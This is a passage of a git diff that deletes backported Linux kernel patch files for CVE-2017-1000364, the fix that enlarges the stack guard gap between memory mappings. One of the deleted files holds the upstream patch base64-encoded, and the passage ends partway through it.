--	if (actual_size > ACCESS_ONCE(rlim[RLIMIT_STACK].rlim_cur))
-+	if (size > ACCESS_ONCE(rlim[RLIMIT_STACK].rlim_cur))
- 		return -ENOMEM;
- 
- 	/* mlock limit tests */
-@@ -2131,32 +2145,40 @@
-  */
- int expand_upwards(struct vm_area_struct *vma, unsigned long address)
- {
--	int error;
-+	struct vm_area_struct *next;
-+	unsigned long gap_addr;
-+	int error = 0;
- 
- 	if (!(vma->vm_flags & VM_GROWSUP))
- 		return -EFAULT;
- 
--	/*
--	 * We must make sure the anon_vma is allocated
--	 * so that the anon_vma locking is not a noop.
--	 */
-+	/* Guard against wrapping around to address 0. */
-+	address &= PAGE_MASK;
-+	address += PAGE_SIZE;
-+	if (!address)
-+		return -ENOMEM;
-+
-+	/* Enforce stack_guard_gap */
-+	gap_addr = address + stack_guard_gap;
-+	if (gap_addr < address)
-+		return -ENOMEM;
-+	next = vma->vm_next;
-+	if (next && next->vm_start < gap_addr) {
-+		if (!(next->vm_flags & VM_GROWSUP))
-+			return -ENOMEM;
-+		/* Check that both stack segments have the same anon_vma? */
-+	}
-+
-+	/* We must make sure the anon_vma is allocated. */
- 	if (unlikely(anon_vma_prepare(vma)))
- 		return -ENOMEM;
--	vma_lock_anon_vma(vma);
- 
- 	/*
- 	 * vma->vm_start/vm_end cannot change under us because the caller
- 	 * is required to hold the mmap_sem in read mode.  We need the
- 	 * anon_vma lock to serialize against concurrent expand_stacks.
--	 * Also guard against wrapping around to address 0.
- 	 */
--	if (address < PAGE_ALIGN(address+4))
--		address = PAGE_ALIGN(address+4);
--	else {
--		vma_unlock_anon_vma(vma);
--		return -ENOMEM;
--	}
--	error = 0;
-+	vma_lock_anon_vma(vma);
- 
- 	/* Somebody else might have raced and expanded it already */
- 	if (address > vma->vm_end) {
-@@ -2187,7 +2209,7 @@
- 				if (vma->vm_next)
- 					vma_gap_update(vma->vm_next);
- 				else
--					vma->vm_mm->highest_vm_end = address;
-+					vma->vm_mm->highest_vm_end = vm_end_gap(vma);
- 				spin_unlock(&vma->vm_mm->page_table_lock);
- 
- 				perf_event_mmap(vma);
-@@ -2207,27 +2229,36 @@
- int expand_downwards(struct vm_area_struct *vma,
- 				   unsigned long address)
- {
-+	struct vm_area_struct *prev;
-+	unsigned long gap_addr;
- 	int error;
--
--	/*
--	 * We must make sure the anon_vma is allocated
--	 * so that the anon_vma locking is not a noop.
--	 */
--	if (unlikely(anon_vma_prepare(vma)))
--		return -ENOMEM;
- 
- 	address &= PAGE_MASK;
- 	error = security_mmap_addr(address);
- 	if (error)
- 		return error;
- 
--	vma_lock_anon_vma(vma);
-+	/* Enforce stack_guard_gap */
-+	gap_addr = address - stack_guard_gap;
-+	if (gap_addr > address)
-+		return -ENOMEM;
-+	prev = vma->vm_prev;
-+	if (prev && prev->vm_end > gap_addr) {
-+		if (!(prev->vm_flags & VM_GROWSDOWN))
-+			return -ENOMEM;
-+		/* Check that both stack segments have the same anon_vma? */
-+	}
-+
-+	/* We must make sure the anon_vma is allocated. */
-+	if (unlikely(anon_vma_prepare(vma)))
-+		return -ENOMEM;
- 
- 	/*
- 	 * vma->vm_start/vm_end cannot change under us because the caller
- 	 * is required to hold the mmap_sem in read mode.  We need the
- 	 * anon_vma lock to serialize against concurrent expand_stacks.
- 	 */
-+	vma_lock_anon_vma(vma);
- 
- 	/* Somebody else might have raced and expanded it already */
- 	if (address < vma->vm_start) {
-@@ -2269,28 +2300,25 @@
- 	return error;
- }
- 
--/*
-- * Note how expand_stack() refuses to expand the stack all the way to
-- * abut the next virtual mapping, *unless* that mapping itself is also
-- * a stack mapping. We want to leave room for a guard page, after all
-- * (the guard page itself is not added here, that is done by the
-- * actual page faulting logic)
-- *
-- * This matches the behavior of the guard page logic (see mm/memory.c:
-- * check_stack_guard_page()), which only allows the guard page to be
-- * removed under these circumstances.
-- */
-+/* enforced gap between the expanding stack and other mappings. */
-+unsigned long stack_guard_gap = 256UL<<PAGE_SHIFT;
-+
-+static int __init cmdline_parse_stack_guard_gap(char *p)
-+{
-+	unsigned long val;
-+	char *endptr;
-+
-+	val = simple_strtoul(p, &endptr, 10);
-+	if (!*endptr)
-+		stack_guard_gap = val << PAGE_SHIFT;
-+
-+	return 0;
-+}
-+__setup("stack_guard_gap=", cmdline_parse_stack_guard_gap);
-+
- #ifdef CONFIG_STACK_GROWSUP
- int expand_stack(struct vm_area_struct *vma, unsigned long address)
- {
--	struct vm_area_struct *next;
--
--	address &= PAGE_MASK;
--	next = vma->vm_next;
--	if (next && next->vm_start == address + PAGE_SIZE) {
--		if (!(next->vm_flags & VM_GROWSUP))
--			return -ENOMEM;
--	}
- 	return expand_upwards(vma, address);
- }
- 
-@@ -2312,14 +2340,6 @@
- #else
- int expand_stack(struct vm_area_struct *vma, unsigned long address)
- {
--	struct vm_area_struct *prev;
--
--	address &= PAGE_MASK;
--	prev = vma->vm_prev;
--	if (prev && prev->vm_end == address) {
--		if (!(prev->vm_flags & VM_GROWSDOWN))
--			return -ENOMEM;
--	}
- 	return expand_downwards(vma, address);
- }
- 
-@@ -2415,7 +2435,7 @@
- 		vma->vm_prev = prev;
- 		vma_gap_update(vma);
- 	} else
--		mm->highest_vm_end = prev ? prev->vm_end : 0;
-+		mm->highest_vm_end = prev ? vm_end_gap(prev) : 0;
- 	tail_vma->vm_next = NULL;
- 	mm->mmap_cache = NULL;		/* Kill the cache. */
- }
diff --git a/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0005.patch.base64 b/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0005.patch.base64
deleted file mode 100644
index 44d7979f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0005.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSA5OTU0ZTMzZWYwZTFmNWUxMTM2YzFiZGRlMWUxOGY0MGU5YzhhZjY5IE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBIdWdoIERpY2tpbnMgPGh1Z2hkQGdvb2dsZS5jb20+CkRhdGU6IE1vbiwgMTkgSnVuIDIwMTcgMDQ6MDM6MjQgLTA3MDAKU3ViamVjdDogW1BBVENIXSBtbTogbGFyZ2VyIHN0YWNrIGd1YXJkIGdhcCwgYmV0d2VlbiB2bWFzCgpjb21taXQgMWJlNzEwN2ZiZTE4ZWVkM2UzMTlhNmMzZTgzYzc4MjU0YjY5M2FjYiB1cHN0cmVhbS4KClN0YWNrIGd1YXJkIHBhZ2UgaXMgYSB1c2VmdWwgZmVhdHVyZSB0byByZWR1Y2UgYSByaXNrIG9mIHN0YWNrIHNtYXNoaW5nCmludG8gYSBkaWZmZXJlbnQgbWFwcGluZy4gV2UgaGF2ZSBiZWVuIHVzaW5nIGEgc2luZ2xlIHBhZ2UgZ2FwIHdoaWNoCmlzIHN1ZmZpY2llbnQgdG8gcHJldmVudCBoYXZpbmcgc3RhY2sgYWRqYWNlbnQgdG8gYSBkaWZmZXJlbnQgbWFwcGluZy4KQnV0IHRoaXMgc2VlbXMgdG8gYmUgaW5zdWZmaWNpZW50IGluIHRoZSBsaWdodCBvZiB0aGUgc3RhY2sgdXNhZ2UgaW4KdXNlcnNwYWNlLiBFLmcuIGdsaWJjIHVzZXMgYXMgbGFyZ2UgYXMgNjRrQiBhbGxvY2EoKSBpbiBtYW55IGNvbW1vbmx5CnVzZWQgZnVuY3Rpb25zLiBPdGhlcnMgdXNlIGNvbnN0cnVjdHMgbGlrcyBnaWRfdCBidWZmZXJbTkdST1VQU19NQVhdCndoaWNoIGlzIDI1NmtCIG9yIHN0YWNrIHN0cmluZ3Mgd2l0aCBNQVhfQVJHX1NUUkxFTi4KClRoaXMgd2lsbCBiZWNvbWUgZXNwZWNpYWxseSBkYW5nZXJvdXMgZm9yIHN1aWQgYmluYXJpZXMgYW5kIHRoZSBkZWZhdWx0Cm5vIGxpbWl0IGZvciB0aGUgc3RhY2sgc2l6ZSBsaW1pdCBiZWNhdXNlIHRob3NlIGFwcGxpY2F0aW9ucyBjYW4gYmUKdHJpY2tlZCB0byBjb25zdW1lIGEgbGFyZ2UgcG9ydGlvbiBvZiB0aGUgc3RhY2sgYW5kIGEgc2luZ2xlIGdsaWJjIGNhbGwKY291bGQganVtcCBvdmVyIHRoZSBndWFyZCBwYWdlLiBUaGVzZSBhdHRhY2tzIGFyZSBub3QgdGhlb3JldGljYWwsCnVuZm9ydHVuYXRlbGx5LgoKTWFrZSB0aG9zZSBhdHRhY2tzIGxlc3MgcHJvYmFibGUgYnkgaW5jcmVhc2luZyB0aGUgc3RhY2sgZ3VhcmQgZ2FwCnRvIDFNQiAob24gc3lzdGVtcyB3aXRoIDRrIHBhZ2VzOyBidXQgbWFrZSBpdCBkZXBlbmQgb24gdGhlIHBhZ2Ugc2l6ZQpiZWNhdXNlIHN5c3RlbXMgd2l0aCBsYXJnZXIgYmFzZSBwYWdlcyBtaWdodCBjYXAgc3RhY2sgYWxsb2NhdGlvbnMgaW4KdGhlIFBBR0VfU0laRSB1bml0cykgd2hpY2ggc2hvdWxkIGNvdmVyIGxhcmdlciBhbGxvY2EoKSBhbmQgVkxBIHN0YWNrCmFsbG9jYXRpb25zLiBJdCBpcyBvYnZpb3VzbHkgbm90IGEgZnVsbCBmaXggYmVjYXVzZSB0aGUgcHJvYmxlbSBpcwpzb21laG93IGluaGVyZW50LCBidXQgaXQgc2hvdWxkIHJlZHVjZSBhdHRhY2sgc3BhY2UgYSBsb3QuCgpPbmUgY291bGQgYXJndWUgdGhhdCB0aGUgZ2FwIHNpemUgc2hvdWxkIGJlIGNvbmZpZ3VyYWJsZSBmcm9tIHVzZXJzcGFjZSwKYnV0IHRoYXQgY2FuIGJlIGRvbmUgbGF0ZXIgd2hlbiBzb21lYm9keSBmaW5kcyB0aGF0IHRoZSBuZXcgMU1CIGlzIHdyb25nCmZvciBzb21lIHNwZWNpYWwgY2FzZSBhcHBsaWNhdGlvbnMuICBGb3Igbm93LCBhZGQgYSBrZXJuZWwgY29tbWFuZCBsaW5lCm9wdGlvbiAoc3RhY2tfZ3VhcmRfZ2FwKSB0byBzcGVjaWZ5IHRoZSBzdGFjayBnYXAgc2l6ZSAoaW4gcGFnZSB1bml0cykuCgpJbXBsZW1lbnRhdGlvbiB3aXNlLCBmaXJzdCBkZWxldGUgYWxsIHRoZSBvbGQgY29kZSBmb3Igc3RhY2sgZ3VhcmQgcGFnZToKYmVjYXVzZSBhbHRob3VnaCB3ZSBjb3VsZCBnZXQgYXdheSB3aXRoIGFjY291bnRpbmcgb25lIGV4dHJhIHBhZ2UgaW4gYQpzdGFjayB2bWEsIGFjY291bnRpbmcgYSBsYXJnZXIgZ2FwIGNhbiBicmVhayB1c2Vyc3BhY2UgLSBjYXNlIGluIHBvaW50LAphIHByb2dyYW0gcnVuIHdpdGggInVsaW1pdCAtUyAtdiAyMDAwMCIgZmFpbGVkIHdoZW4gdGhlIDFNQiBnYXAgd2FzCmNvdW50ZWQgZm9yIFJMSU1JVF9BUzsgc2ltaWxhciBwcm9ibGVtcyBjb3VsZCBjb21lIHdpdGggUkxJTUlUX01MT0NLCmFuZCBzdHJpY3Qgbm9uLW92ZXJjb21taXQgbW9kZS4KCkluc3RlYWQgb2Yga2VlcGluZyBnYXAgaW5zaWRlIHRoZSBzdGFjayB2bWEsIG1haW50YWluIHRoZSBzdGFjayBndWFyZApnYXAgYXMgYSBnYXAgYmV0d2VlbiB2bWFzOiB1c2luZyB2bV9zdGFydF9nYXAoKSBpbiBwbGFjZSBvZiB2bV9zdGFydAoob3Igdm1fZW5kX2dhcCgpIGluIHBsYWNlIG9mIHZtX2VuZCBpZiBWTV9HUk9XU1VQKSBpbiBqdXN0IHRob3NlIGZldwpwbGFjZXMgd2hpY2ggbmVlZCB0byByZXNwZWN0IHRoZSBnYXAgLSBtYWlubHkgYXJjaF9nZXRfdW5tYXBwZWRfYXJlYSgpLAphbmQgYW5kIHRoZSB2bWEgdHJlZSdzIHN1YnRyZWVfZ2FwIHN1cHBvcnQgZm9yIHRoYXQuCgpDaGFuZ2UtSWQ6IEk4OTk1MTEwNzljNTA1N2VlNTI5OWVmMWFmZjVhYjhmMGM3N2M3NDBkCk9yaWdpbmFsLXBhdGNoLWJ5OiBPbGVnIE5lc3Rlcm92IDxvbGVnQHJlZGhhdC5jb20+Ck9yaWdpbmFsLXBhdGNoLWJ5OiBNaWNoYWwgSG9ja28gPG1ob2Nrb0BzdXNlLmNvbT4KU2lnbmVkLW9mZi1ieTogSHVnaCBEaWNraW5zIDxodWdoZEBnb29nbGUuY29tPgpbd3Q6IGJhY2twb3J0IHRvIDQuMTE6IGFkanVzdCBjb250ZXh0XQpbd3Q6IGJhY2twb3J0IHRvIDQuOTogYWRqdXN0IGNvbnRleHQgOyBrZXJuZWwgZG9jIHdhcyBub3QgaW4gYWRtaW4tZ3VpZGVdClt3dDogYmFja3BvcnQgdG8gNC40OiBhZGp1c3QgY29udGV4dCA7IGRyb3AgcHBjIGh1Z2V0bGJfcmFkaXggY2hhbmdlc10KW3d0OiBiYWNrcG9ydCB0byAzLjE4OiBhZGp1c3QgY29udGV4dCA7IG5vIEZPTExfUE9QVUxBVEUgOwogICAgIHMzOTAgdXNlcyBnZW5lcmljIGFyY2hfZ2V0X3VubWFwcGVkX2FyZWEoKV0KW3d0OiBiYWNrcG9ydCB0byAzLjE2OiBhZGp1c3QgY29udGV4dF0KW3d0OiBiYWNrcG9ydCB0byAzLjEwOiBhZGp1c3QgY29udGV4dCA7IGNvZGUgbG9naWMgaW4gUEFSSVNDJ3MKICAgICBhcmNoX2dldF91bm1hcHBlZF9hcmVhKCkgd2Fzbid0IGZvdW5kIDsgY29kZSBpbnNlcnRlZCBpbnRvCiAgICAgZXhwYW5kX3Vwd2FyZHMoKSBhbmQgZXhwYW5kX2Rvd253YXJkcygpIHJ1bnMgdW5kZXIgYW5vbl92bWEgbG9jazsKICAgICBjaGFuZ2VzIGZvciBndXAuYzpmYXVsdGluX3BhZ2UgZ28gdG8gbWVtb3J5LmM6X19nZXRfdXNlcl9wYWdlcygpOwogICAgIGluY2x1ZGVkIEh1Z2ggRGlja2lucycgZml4ZXNdClNpZ25lZC1vZmYtYnk6IFdpbGx5IFRhcnJlYXUgPHdAMXd0LmV1PgotLS0KCmRpZmYgLS1naXQgYS9Eb2N1bWVudGF0aW9uL2tlcm5lbC1wYXJhbWV0ZXJzLnR4dCBiL0RvY3VtZW50YXRpb24va2VybmVsLXBhcmFtZXRlcnMudHh0CmluZGV4IDJmY2JlZTEuLmE5MWQwMzUgMTAwNjQ0Ci0tLSBhL0RvY3VtZW50YXRpb24va2VybmVsLXBhcmFtZXRlcnMudHh0CisrKyBiL0RvY3VtZW50YXRpb24va2VybmVsLXBhcmFtZXRlcnMudHh0CkBAIC0yOTE4LDYgKzI5MTgsMTMgQEAKIAlzcGlhX3BlZHI9CiAJc3BpYV9wZWRkcj0KIAorCXN0YWNrX2d1YXJkX2dhcD0JW01NXQorCQkJb3ZlcnJpZGUgdGhlIGRlZmF1bHQgc3RhY2sgZ2FwIHByb3RlY3Rpb24uIFRoZSB2YWx1ZQorCQkJaXMgaW4gcGFnZSB1bml0cyBhbmQgaXQgZGVmaW5lcyBob3cgbWFueSBwYWdlcyBwcmlvcgorCQkJdG8gKGZvciBzdGFja3MgZ3Jvd2luZyBkb3duKSByZXNwLiBhZnRlciAoZm9yIHN0YWNrcworCQkJZ3Jvd2luZyB1cCkgdGhlIG1haW4gc3RhY2sgYXJlIHJlc2VydmVkIGZvciBubyBvdGhlcgorCQkJbWFwcGluZy4gRGVmYXVsdCB2YWx1ZSBpcyAyNTYgcGFnZXMuCisKIAlzdGFja3RyYWNlCVtGVFJBQ0VdCiAJCQlFbmFibGVkIHRoZSBzdGFjayB0cmFjZXIgb24gYm9vdCB1cC4KIApkaWZmIC0tZ2l0IGEvYXJjaC9hcmMvbW0vbW1hcC5jIGIvYXJjaC9hcmMvbW0vbW1hcC5jCmluZGV4IDJlMDZkNTYuLmNmNGFlNjkgMTAwNjQ0Ci0tLSBhL2FyY2gvYXJjL21tL21tYXAuYworKysgYi9hcmNoL2FyYy9tbS9tbWFwLmMKQEAgLTY0LDcgKzY0LDcgQEAKIAogCQl2bWEgPSBmaW5kX3ZtYShtbSwgYWRkcik7CiAJCWlmIChUQVNLX1NJWkUgLSBsZW4gPj0gYWRkciAmJgotCQkgICAgKCF2bWEgfHwgYWRkciArIGxlbiA8PSB2bWEtPnZtX3N0YXJ0KSkKKwkJICAgICghdm1hIHx8IGFkZHIgKyBsZW4gPD0gdm1fc3RhcnRfZ2FwKHZtYSkpKQogCQkJcmV0dXJuIGFkZHI7CiAJfQogCmRpZmYgLS1naXQgYS9hcmNoL2FybS9tbS9tbWFwLmMgYi9hcmNoL2FybS9tbS9tbWFwLmMKaW5kZXggMmQ2ODlkMS4uZGFlNDdkZiAxMDA2NDQKLS0tIGEvYXJjaC9hcm0vbW0vbW1hcC5jCisrKyBiL2FyY2gvYXJtL21tL21tYXAuYwpAQCAtODksNyArODksNyBAQAogCiAJCXZtYSA9IGZpbmRfdm1hKG1tLCBhZGRyKTsKIAkJaWYgKFRBU0tfU0laRSAtIGxlbiA+PSBhZGRyICYmCi0JCSAgICAoIXZtYSB8fCBhZGRyICsgbGVuIDw9IHZtYS0+dm1fc3RhcnQpKQorCQkgICAgKCF2bWEgfHwgYWRkciArIGxlbiA8PSB2bV9zdGFydF9nYXAodm1hKSkpCiAJCQlyZXR1cm4gYWRkcjsKIAl9CiAKQEAgLTE0MCw3ICsxNDAsNyBAQAogCQkJYWRkciA9IFBBR0VfQUxJR04oYWRkcik7CiAJCXZtYSA9IGZpbmRfdm1hKG1tLCBhZGRyKTsKIAkJaWYgKFRBU0tfU0laRSAtIGxlbiA+PSBhZGRyICYmCi0JCQkJKCF2bWEgfHwgYWRkciArIGxlbiA8PSB2bWEtPnZtX3N0YXJ0KSkKKwkJCQkoIXZtYSB8fCBhZGRyICsgbGVuIDw9IHZtX3N0YXJ0X2dhcCh2bWEpKSkKIAkJCXJldHVybiBhZGRyOwogCX0KIApkaWZmIC0tZ2l0IGEvYXJjaC9mcnYvbW0vZWxmLWZkcGljLmMgYi9hcmNoL2Zydi9tbS9lbGYtZmRwaWMuYwppbmRleCA4MzZmMTQ3Li5lZmE1OWYxIDEwMDY0NAotLS0gYS9hcmNoL2Zydi9tbS9lbGYtZmRwaWMuYworKysgYi9hcmNoL2Zydi9tbS9lbGYtZmRwaWMuYwpAQCAtNzQsNyArNzQsNyBAQAogCQlhZGRyID0gUEFHRV9BTElHTihhZGRyKTsKIAkJdm1hID0gZmluZF92bWEoY3VycmVudC0+bW0sIGFkZHIpOwogCQlpZiAoVEFTS19TSVpFIC0gbGVuID49IGFkZHIgJiYKLQkJICAgICghdm1hIHx8IGFkZHIgKyBsZW4gPD0gdm1hLT52bV9zdGFydCkpCisJCSAgICAoIXZtYSB8fCBhZGRyICsgbGVuIDw9IHZtX3N0YXJ0X2dhcCh2bWEpKSkKIAkJCWdvdG8gc3VjY2VzczsKIAl9CiAKZGlmZiAtLWdpdCBhL2FyY2gvbWlwcy9tbS9tbWFwLmMgYi9hcmNoL21pcHMvbW0vbW1hcC5jCmluZGV4IDVhYjllOTYuLjdmNDYzNDYgMTAwNjQ0Ci0tLSBhL2FyY2gvbWlwcy9tbS9tbWFwLmMKKysrIGIvYXJjaC9taXBzL21tL21tYXAuYwpAQCAtOTIsNyArOTIsNyBAQAogCiAJCXZtYSA9IGZpbmRfdm1hKG1tLCBhZGRyKTsKIAkJaWYgKFRBU0tfU0laRSAtIGxlbiA+PSBhZGRyICYmCi0JCSAgICAoIXZtYSB8fCBhZGRyICsgbGVuIDw9IHZtYS0+dm1fc3RhcnQpKQorCQkgICAgKCF2bWEgfHwgYWRkciArIGxlbiA8PSB2bV9zdGFydF9nYXAodm1hKSkpCiAJCQlyZXR1cm4gYWRkcjsKIAl9CiAKZGlmZiAtLWdpdCBhL2FyY2gvcG93ZXJwYy9tbS9zbGljZS5jIGIvYXJjaC9wb3dlcnBjL21tL3NsaWNlLmMKaW5kZXggN2NlOWNmMy4uODg3MzY1YSAxMDA2NDQKLS0tIGEvYXJjaC9wb3dlcnBjL21tL3NsaWNlLmMKKysrIGIvYXJjaC9wb3dlcnBjL21tL3NsaWNlLmMKQEAgLTEwMyw3ICsxMDMsNyBAQAogCWlmICgobW0tPnRhc2tfc2l6ZSAtIGxlbikgPCBhZGRyKQogCQlyZXR1cm4gMDsKIAl2bWEgPSBmaW5kX3ZtYShtbSwgYWRkcik7Ci0JcmV0dXJuICghdm1hIHx8IChhZGRyICsgbGVuKSA8PSB2bWEtPnZtX3N0YXJ0KTsKKwlyZXR1cm4gKCF2bWEgfHwgKGFkZHIgKyBsZW4pIDw9IHZtX3N0YXJ0X2dhcCh2bWEpKTsKIH0KIAogc3RhdGljIGludCBzbGljZV9sb3dfaGFzX3ZtYShzdHJ1Y3QgbW1fc3RydWN0ICptbSwgdW5zaWduZWQgbG9uZyBzbGljZSkKZGlmZiAtLWdpdCBhL2FyY2gvc2gvbW0vbW1hcC5jIGIvYXJjaC9zaC9tbS9tbWFwLmMKaW5kZXggNjc3NzE3Ny4uN2RmN2Q1OSAxMDA2NDQKLS0tIGEvYXJjaC9zaC9tbS9tbWFwLmMKKysrIGIvYXJjaC9zaC9tbS9tbWFwLmMKQEAgLTYzLDcgKzYzLDcgQEAKIAogCQl2bWEgPSBmaW5kX3ZtYShtbSwgYWRkcik7CiAJCWlmIChUQVNLX1NJWkUgLSBsZW4gPj0gYWRkciAmJgotCQkgICAgKCF2bWEgfHwgYWRkciArIGxlbiA8PSB2bWEtPnZtX3N0YXJ0KSkKKwkJICAgICghdm1hIHx8IGFkZHIgKyBsZW4gPD0gdm1fc3RhcnRfZ2FwKHZtYSkpKQogCQkJcmV0dXJuIGFkZHI7CiAJfQogCkBAIC0xMTMsNyArMTEzLDcgQEAKIAogCQl2bWEgPSBmaW5kX3ZtYShtbSwgYWRkcik7CiAJCWlmIChUQVNLX1NJWkUgLSBsZW4gPj0gYWRkciAmJgotCQkgICAgKCF2bWEgfHwgYWRkciArIGxlbiA8PSB2bWEtPnZtX3N0YXJ0KSkKKwkJICAgICghdm1hIHx8IGFkZHIgKyBsZW4gPD0gdm1fc3RhcnRfZ2FwKHZtYSkpKQogCQkJcmV0dXJuIGFkZHI7CiAJfQogCmRpZmYgLS1naXQgYS9hcmNoL3NwYXJjL2tlcm5lbC9zeXNfc3BhcmNfNjQuYyBiL2FyY2gvc3BhcmMva2VybmVsL3N5c19zcGFyY182NC5jCmluZGV4IDIxYmNhMjEuLmVhODBjMGIgMTAwNjQ0Ci0tLSBhL2FyY2gvc3BhcmMva2VybmVsL3N5c19zcGFyY182NC5jCisrKyBiL2FyY2gvc3BhcmMva2VybmVsL3N5c19zcGFyY182NC5jCkBAIC0xMTksNyArMTE5LDcgQEAKIAogCQl2bWEgPSBmaW5kX3ZtYShtbSwgYWRkcik7CiAJCWlmICh0YXNrX3NpemUgLSBsZW4gPj0gYWRkciAmJgotCQkgICAgKCF2bWEgfHwgYWRkciArIGxlbiA8PSB2bWEtPnZtX3N0YXJ0KSkKKwkJICAgICghdm1hIHx8IGFkZHIgKyBsZW4gPD0gdm1fc3RhcnRfZ2FwKHZtYSkpKQogCQkJcmV0dXJuIGFkZHI7CiAJfQogCkBAIC0xODIsNyArMTgyLDcgQEAKIAogCQl2bWEgPSBmaW5kX3ZtYShtbSwgYWRkcik7CiAJCWlmICh0YXNrX3NpemUgLSBsZW4gPj0gYWRkciAmJgotCQkgICAgKCF2bWEgfHwgYWRkciArIGxlbiA8PSB2bWEtPnZtX3N0YXJ0KSkKKwkJICAgICghdm1hIHx8IGFkZHIgKyBsZW4gPD0gdm1fc3RhcnRfZ2FwKHZtYSkpKQogCQkJcmV0dXJuIGFkZHI7CiAJfQogCmRpZmYgLS1naXQgYS9hcmNoL3NwYXJjL21tL2h1Z2V0bGJwYWdlLmMgYi9hcmNoL3NwYXJjL21tL2h1Z2V0bGJwYWdlLmMKaW5kZXggOTYzOTk2NC4uNjRlZTg4OCAxMDA2NDQKLS0tIGEvYXJjaC9zcGFyYy9tbS9odWdldGxicGFnZS5jCisrKyBiL2FyY2gvc3BhcmMvbW0vaHVnZXRsYnBhZ2UuYwpAQCAtMTE4LDcgKzExOCw3IEBACiAJCWFkZHIgPSBBTElHTihhZGRyLCBIUEFHRV9TSVpFKTsKIAkJdm1hID0gZmluZF92bWEobW0sIGFkZHIpOwogCQlpZiAodGFza19zaXplIC0gbGVuID49IGFkZHIgJiYKLQkJICAgICghdm1hIHx8IGFkZHIgKyBsZW4gPD0gdm1hLT52bV9zdGFydCkpCisJCSAgICAoIXZtYSB8fCBhZGRyICsgbGVuIDw9IHZtX3N0YXJ0X2dhcCh2bWEpKSkKIAkJCXJldHVybiBhZGRyOwogCX0KIAlpZiAobW0tPmdldF91bm1hcHBlZF9hcmVhID09IGFyY2hfZ2V0X3VubWFwcGVkX2FyZWEpCmRpZmYgLS1naXQgYS9hcmNoL3RpbGUvbW0vaHVnZXRsYnBhZ2UuYyBiL2FyY2gvdGlsZS9tbS9odWdldGxicGFnZS5jCmluZGV4IDBhYzM1OTkuLmQ0MzUyMTUgMTAwNjQ0Ci0tLSBhL2FyY2gvdGlsZS9tbS9odWdldGxicGFnZS5jCisrKyBiL2FyY2gvdGlsZS9tbS9odWdldGxicGFnZS5jCkBAIC0zMDIsNyArMzAyLDcgQEAKIAkJYWRkciA9IEFMSUdOKGFkZHIsIGh1Z2VfcGFnZV9zaXplKGgpKTsKIAkJdm1hID0gZmluZF92bWEobW0sIGFkZHIpOwogCQlpZiAoVEFTS19TSVpFIC0gbGVuID49IGFkZHIgJiYKLQkJICAgICghdm1hIHx8IGFkZHIgKyBsZW4gPD0gdm1hLT52bV9zdGFydCkpCisJCSAgICAoIXZtYSB8fCBhZGRyICsgbGVuIDw9IHZtX3N0YXJ0X2dhcCh2bWEpKSkKIAkJCXJldHVybiBhZGRyOwogCX0KIAlpZiAoY3VycmVudC0+bW0tPmdldF91bm1hcHBlZF9hcmVhID09IGFyY2hfZ2V0X3VubWFwcGVkX2FyZWEpCmRpZmYgLS1naXQgYS9hcmNoL3g4Ni9rZXJuZWwvc3lzX3g4Nl82NC5jIGIvYXJjaC94ODYva2VybmVsL3N5c194ODZfNjQuYwppbmRleCAzMDI3N2UyLi5kMDUwMzkzIDEwMDY0NAotLS0gYS9hcmNoL3g4Ni9rZXJuZWwvc3lzX3g4Nl82NC5jCisrKyBiL2FyY2gveDg2L2tlcm5lbC9zeXNfeDg2XzY0LmMKQEAgLTEyNyw3ICsxMjcsNyBAQAogCQlhZGRyID0gUEFHRV9BTElHTihhZGRyKTsKIAkJdm1hID0gZmluZF92bWEobW0sIGFkZHIpOwogCQlpZiAoZW5kIC0gbGVuID49IGFkZHIgJiYKLQkJICAgICghdm1hIHx8IGFkZHIgKyBsZW4gPD0gdm1hLT52bV9zdGFydCkpCisJCSAgICAoIXZtYSB8fCBhZGRyICsgbGVuIDw9IHZtX3N0YXJ0X2dhcCh2bWEpKSkKIAkJCXJldHVybiBhZGRyOwogCX0KIApAQCAtMTY2LDcgKzE2Niw3IEBACiAJCWFkZHIgPSBQQUdFX0FMSUdOKGFkZHIpOwogCQl2bWEgPSBmaW5kX3ZtYShtbSwgYWRkcik7CiAJCWlmIChUQVNLX1NJWkUgLSBsZW4gPj0gYWRkciAmJgotCQkJCSghdm1hIHx8IGFkZHIgKyBsZW4gPD0gdm1hLT52bV9zdGFydCkpCisJCQkJKCF2bWEgfHwgYWRkciArIGxlbiA8PSB2bV9zdGFydF9nYXAodm1hKSkpCiAJCQlyZXR1cm4gYWRkcjsKIAl9CiAKZGlmZiAtLWdpdCBhL2FyY2gveDg2L21tL2h1Z2V0bGJwYWdlLmMgYi9hcmNoL3g4Ni9tbS9odWdldGxicGFnZS5jCmluZGV4IDQzNDg4MDMuLjFiYjU1NzAgMTAwNjQ0Ci0tLSBhL2FyY2gveDg2L21tL2h1Z2V0bGJwYWdlLmMKKysrIGIvYXJjaC94ODYvbW0vaHVnZXRsYnBhZ2UuYwpAQCAtMzQ5LDcgKzM0OSw3IEBACiAJCWFkZHIgPSBBTElHTihhZGRyLCBodWdlX3BhZ2Vfc2l6ZShoKSk7CiAJCXZtYSA9IGZpbmRfdm1hKG1tLCBhZGRyKTsKIAkJaWYgKFRBU0tfU0laRSAtIGxlbiA+PSBhZGRyICYmCi0JCSAgICAoIXZtYSB8fCBhZGRyICsgbGVuIDw9IHZtYS0+dm1fc3RhcnQpKQorCQkgICAgKCF2bWEgfHwgYWRkciArIGxlbiA8PSB2bV9zdGFydF9nYXAodm1hKSkpCiAJCQlyZXR1cm4gYWRkcjsKIAl9CiAJaWYgKG1tLT5nZXRfdW5tYXBwZWRfYXJlYSA9PSBhcmNoX2dldF91bm1hcHBlZF9hcmVhKQpkaWZmIC0tZ2l0IGEvYXJjaC94dGVuc2Eva2VybmVsL3N5c2NhbGwuYyBiL2FyY2gveHRlbnNhL2tlcm5lbC9zeXNjYWxsLmMKaW5kZXggNWQzZjdhMS4uMWZmMGI5MiAxMDA2NDQKLS0tIGEvYXJjaC94dGVuc2Eva2VybmVsL3N5c2NhbGwuYworKysgYi9hcmNoL3h0ZW5zYS9rZXJuZWwvc3lzY2FsbC5jCkBAIC04Niw3ICs4Niw3IEBACiAJCS8qIEF0IHRoaXMgcG9pbnQ6ICAoIXZtbSB8fCBhZGRyIDwgdm1tLT52bV9lbmQpLiAqLwogCQlpZiAoVEFTS19TSVpFIC0gbGVuIDwgYWRkcikKIAkJCXJldHVybiAtRU5PTU